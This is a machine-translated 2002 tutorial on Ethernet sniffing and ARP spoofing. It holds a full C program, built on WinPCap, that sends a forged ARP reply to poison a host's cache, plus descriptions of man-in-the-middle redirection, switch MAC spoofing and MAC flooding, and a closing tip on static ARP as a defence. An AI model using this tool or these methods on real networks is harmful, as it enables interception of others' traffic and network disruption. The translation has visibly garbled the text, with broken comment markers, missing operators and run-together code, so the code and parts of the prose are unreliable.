Creation time: 2002-04-11
Article attribute: original
Article Source:
Www.opengram.com
Article submission:
Refdom (refDom_at_263.net)
Author: Refdom
Email: Refdom@263.net
Homepage:
http://www.opengram.com
2002-4-6
The sniffing in the Ethernet is not a good thing for network security, although it is possible to track the data packet and discovery for network administrators.
Network issues, but if the destroyed is used, it constitutes a serious security threat to the entire network. As for the benefits of sniffing and badness.
ARP cache table
Suppose such a network:
------------
| HUB |
------------
| | | | |
| | | | |
| | | | |
Hosta Hostb Hostc
among them
A Address is: IP: 192.168.10.1 Mac: AA-AA-AA-AA-AA-AA
B 's address is: IP: 192.168.10.2 Mac: BB-BB-BB-BB-BB-BB
The address of C: IP: 192.168.10.3 Mac: CC-CC-CC-CC-CC-CC
Suppose B is a sniffing enthusiast, such as the ARP cache of the A machine:
C: /> arp -a
Interface: 192.168.10.1 on interface 0x1000003
Internet Address Physical Address Type
192.168.10.3 CC-CC-CC-CC-CC-CC Dynamic
This is the 192.168.10.1 machine ARP cache table, assuming, a time, PING 192.168.10.3, ping host C, will query local
The ARP cache table, find the MAC address of the IP address of C, then data transmission, the destination is the MAC address of C. If there is no C in A in A
Record, then first broadcasts an ARP request, send a response when c receives A, send a response, the answer contains a MAC address with C, then A connection
Received a response from C, you will update the local ARP cache. Then use this MAC address to send data (attached to the NIC).
Therefore, this ARP table of local cache is the basis of local network circulation, and this cache is dynamic.
Hub-Based
Many networks are connected with HUB. When the data package is transferred to other computers through HUB, HUB simply broadcasts this packet.
On all ports of the HUB.
This is a network structure in the example above.
Now A needs to send TCP packets to C. First, a requires the local ARP cache table to see if IP is 192.168.10.3, C's ARP.
Record, if not, a ARP request will be broadcast, when C will receive this request, then a response, then update your own ARP cache table. and
The MAC address corresponding to the IP of C is obtained. At this time, this TCP packet is transmitted, and the MAC address of C is included in the Ethernet frame. When packet transmission
When you go to HUB, the HUB broadcasts the entire packet directly to all ports, and then c can receive the data packet sent by A.
Because Hub broadcasts data to all ports, computer B can also receive a packet sent to C. This is exactly the purpose of B sniffing.
Therefore, the Hub-Based network is basically no security, and the sniffing is very easy in such a network. Switch network (Switch LAN)
The switch is used instead of HUB, which is to solve several security problems of HUB, which is to solve the sniffing problem. Switch is not a number
The port broadcast is based on the package, which will determine the packet transfer to that port through its own ARP cache. Therefore, in the switched network, if the above
The HUB in the example is switched to Switch. B will not receive a packet sent to C, even if the network card is set to mixed mode, it is not possible to sniff.
ARP spoof (ARP spoof)
The ARP protocol is not only received by ARP requests. When the computer receives the ARP response packet, the local ARP cache is
Make updates, store the IP and MAC addresses in your response in the ARP cache. Therefore, in the above hypothesis network, b is sent to A to a forged ARP.
A, and the data in this response is the sender IP address is 192.168.10.3 (IP address of C), the MAC address is DD-DD-DD-DD-DD-DD (C's Mac)
The site should be CC-CC-CC-CC-CC-CC, which is forged here). When A receives B forged ARP answers, the local ARP cache is updated (A may not
I know that it is forged).
Now A machine's ARP cache is updated:
C: /> arp -a
Interface: 192.168.10.1 on interface 0x1000003
Internet Address Physical Address Type
192.168.10.3 DD-DD-DD-DD-DD-DD DYNAMIC
This is not a small thing. The network circulation of the LAN may not be performed according to the IP address, but in accordance with the MAC address. 192.168.10.3
The MAC address is changed to a MAC address that does not exist in A. Now a starting ping 192.168.10.3, the MAC address submitted by the NIC is
DD-DD-DD-DD-DD-DD, what is the result? The network is not true, and a can't ping Cong C! !
This is a simple ARP spoof.
Let's implement such ARP spoof. Here you will need to use a WinPCAP API and drive. (
http://winpcap.polito.it/
WinPCAP is a great and open project. NMAP, Snort, Windump in the Windows environment is WinPCAP.
///
//
// ARP Sender
//
// Creator: Refdom
// email: Refdom@263.net
// Home Page:
Www.opengram.com
//
// 2002/4/7
//
#include "stdafx.h"
#include "mac.h" // getMacaddr (), I am writing a string to the MAC address function, it is not listed here.
#include
#include
#define EPT_IP 0x0800 / * Type: IP * /
#define EPT_ARP 0x0806 / * Type: ARP * / # Define EPT_RARP 0X8035 / * TYPE: RARP * /
#define arp_hardware 0x0001 / * Dummy Type for 802.3 frames * /
#define arp_request 0x0001 / * ARP Request * /
#define arp_reply 0x0002 / * ARP reply * /
#define max_num_adapter 10
#pragma Pack (Push, 1)
Typedef struct ehhdr
{
Unsigned char eh_dst [6]; / * Destination Ethernet Addrress * /
Unsigned char eh_src [6]; / * source ethernet addresss * /
Unsigned short eh_type; / * Ethernet Pachet Type * /
} EHHDR, * PEHHDR;
Typedef struct arphdr
{
Unsigned short arp_hrd; / * format of hardware address * /
Unsigned short arp_pro; / * format of protocol address * /
Unsigned char arp_hln; / * length of hardware address * /
Unsigned char arp_pln; / * length of protocol address * /
Unsigned short arp_op; / * arp / rarp operation * /
Unsigned char arp_sha [6]; / * sender hardware address * /
Unsigned long arp_spa; / * sender protocol address * /
Unsigned char Arp_tha [6]; / * target hardware address * /
Unsigned long arp_tpa; / * target protocol address * /
Arphdr, * PARPHDR;
Typedef struct arpppacket
{
EHHDR EHHDR;
Arphdr arphdr;
Arppacket, * Parppacket;
#pragma pack (POP)
Int main (int Argc, char * argv [])
{
Static char adapterlist [max_num_adapter] [1024];
Char szpacketbuf [600];
Char macaddr [6];
LPADAPTER LPADAPTER;
LPPACKET LPPACKET;
Wchar adaptername [2048];
Wchar * TEMP, * TEMP1;
Arppacket arpppacket;
Ulong adapterLength = 1024;
INT adapternum = 0;
INT NRETCODE, I;
// get the list of adapterif (PacketGetAdapternames ((char *) adaptername, & adapterLength) == false
{
Printf ("Unable to Retrieve the List of the Adapters! / N");
Return 0;
}
Temp = adaptername;
Temp1 = adaptername;
i = 0;
While (* Temp! = '/ 0') || (* (TEMP-1)! = '/ 0'))
{
IF (* temp == '/ 0')
{
Memcpy (AdapterList [i], TEMP1, (TEMP-TEMP1) * 2);
TEMP1 = TEMP 1;
i ;
}
TEMP ;
}
Adapternum = i;
For (i = 0; i WPRINTF (L "/ n% D-% S / N", i 1, AdapterList [i]); Printf ("/ n"); // default open the 0 LPADAPTER = (LPADADAPTER) Packetopenadapter ((LPTSTR) AdapterList [0]); // Take the first network card (assuming) IF (! lpadapter || (lpadapter-> hfile == invalid_handle_value))) { NRETCODE = GetLastError (); Printf ("Unable to Open the Driver, Error Code:% LX / N", NRETCODE); Return 0; } LPPACKET = packetallocatepacket (); IF (LPPACKET == NULL) { Printf ("/ Nerror: failed to allocate the lppacket structure."); Return 0; } ZeromeMory (SzpacketBuf, Sizeof (SzpacketBuf); if (! GetMacAddr ( "BBBBBBBBBBBB", MacAddr)) { Printf ("Get Mac Address Error! / N"); } Memcpy (arpppacket.ehdr.eh_dst, macaddr, 6); // source MAC address IF (! getMacaddr ("Aaaaaaaaaaaa", MacAddr) { Printf ("Get Mac Address Error! / N"); Return 0; } Memcpy (arpppacket.ehdr.eh_src, macaddr, 6); // destination MAC address. (A address) Arppacket.ehdr.eh_type = htons (ePt_arp); Arppacket.arphdr.arp_hrd = htons (arp_hardware); Arppacket.arphdr.arp_pro = htons (ePT_IP); Arppacket.arphdr.arp_hln = 6; Arppacket.arphdr.arp_pln = 4; Arppacket.arphdr.arp_op = htons (arp_reply); if (! GetMacaddr ("DDDDDDDDDDDDDDDDDDDDDDDDDD", MacAddr)) { Printf ("Get Mac Address Error! / N"); Return 0; } Memcpy (arpppacket.arphdr.arp_sha, macaddr, 6); // forged C MAC address Arppacket.arphdr.arp_spa = inet_addr ("192.168.10.3"); // C IP address IF (! getMacaddr ("Aaaaaaaaaaaa", MacAddr) { Printf ("Get Mac Address Error! / N"); Return 0; } Memcpy (arpppacket.arphdr.arp_tha, macaddr, 6); // target A MAC address Arppacket.arphdr.arp_tpa = inet_addr ("192.168.10.1"); // Target A IP Address Memcpy (szpacketbuf, (char *) & arpppacket, sizeof (arpppacket)); PacketinitPacket (LPPACKET, SZPACKETBUF, 60); IF (PacketsetNumWrites (LPADAPTER, 2) == FALSE) { Printf ("Warning: Unable to send more than one packet in a single write! / n"); } IF (PacketSendPacket (LPADAPTER, LPPACKET, TRUE) == FALSE) { Printf ("Error Sending The Packets! / N"); Return 0; } Printf ("Send OK! / N"); // Close the adapter and exit PacketFreePacket; PacketCloseadapter (LPADAPTER); Return 0; } So A receives a forged ARP response. A is deceived! ! If a certain machine is not pleasing to the local area network, ... The sniffing in the Ethernet is too effective, but the switching network is limited to the sniffing, so that the sniffing has a large degree of discount. However, it is easy to Enough to find that the cache table in the host, Switch (Dynamic Update Address Table, and the same) is still (mainly). To be in a switched network Take effective sniffing work (underground party?), You need to use a method of dealing with various cache meters, even deceived, even chaos, on the ARP fraud foundation We can do it. ARP spoofing As in the above program, deceive the target A, and the PING host C is sent to the DD-DD-DD-DD-DD-DD address. Such as When cleaning, the MAC address of C is cheated into BB-BB-BB-BB-BB-BB, so that the data packet sent to C has become sent to B. This is not It is better to receive the data packet sent by A, sniffing success. A doesn't realize this change, but the next thing will make A suspect. Because A and C are not connected! ! B is sent to A transmission The packet to C can not be transferred to C. Do "man in the middle" for ARP redirection. Open B IP forwarding function, a packet sent, forward to C, like a router. However, if b sends ICMP redirection, it interrupts the entire plan. Directly conduct a modification forwarding of the entire package, capture the packet sent by A, all modified, then forward it to C, and the packet received is totally considered It is sent from A. However, the packet sent by C is passed directly to A. If the ARP spoofing for C is again made. Now B is completely A and C intermediate bridges Liang. Mac spoofing for Switch Switch also maintains a dynamic MAC cache, which is usually the first, first, there is a corresponding list inside the switch, the port of the switch At the MAC address table port n <-> Mac, there are those MAC addresses below each port. This table begins to be empty, and the switch has learned from the data frame. Learn. For example, when the computer connected by the Port 1 has issued a data frame, this frame data enters the switch from Port 1, and the switch takes this data frame. The original MAC address AAAA, then records in the address table: Port 1 <-> AAAA, after all the data frames sent to the AAAA, in terms of PORT 1 Output of the port, without output from other ports. Similar to the goals in front of the target. If you modify the Mac-Port table on the Switch, then the corresponding Mac and Port will follow, the original The result of the data that should not be sent to the sniffer is sent, which also achieves the purpose of sniffing. Modify the local (b) packet MAC address as original A MAC address, when the switch is passed, the address of the switch found port B is the MAC address of the machine A, which will be opposite the MAC address B. Should be transmitted from port B from port B, which should be transmitted to port A. Therefore, the data transmitted to A can be obtained from the machine B. However, there is a problem here, and A will not receive the data. The odor is not the purpose of going to destroy normal data communications. At the same time, from the privilege just now Let a MAC address in the switch corresponding to multiple ports, which is not clear for switches. Please advise. FLOOD for Switch Just like the principle of the Mac and Port correspondence of Switch's Mac and Port, because the Mac-Port Cache table is dynamically updated, then the end of the entire Switch Both of the mouth change, the Switch is spoofed by MAC address, and the packet of a large number of fake MAC addresses is constantly transmitted. Switch updates the Mac-Port Cache, if The relationship between the previous normal Mac and Port is destroyed by such a method, then the switch will send the flooding to each port, let Switch base This becomes a HUB, sending a packet to all ports, which can be achieved as the purpose of sniffing. Existing problems, Switch's handling of this limitation, because it is abnormal, may cause a package loss. And now this extreme situation The situation of the Switch status is still not known. If there is a big damage to network communication, this is not normal sniffing (sniffing will also cause some loss). The operation of various means for Switch, requires care, and if the port protection is turned on, it is possible to shut down all users. Therefore, exchange The equipment such as deception or other operation is not as deceived, such as a target host or router for some superiors. As for the means of sniffing, it is based on this dynamic table. Therefore, the use of static ARPs can be presed. For WIN, use ARP -S to make static ARP settings. Thanks to WinPCap, this open project is also grateful to DanceFire to provide a large number of help and corrections. I know it is still enough on the network device, please refer to it.
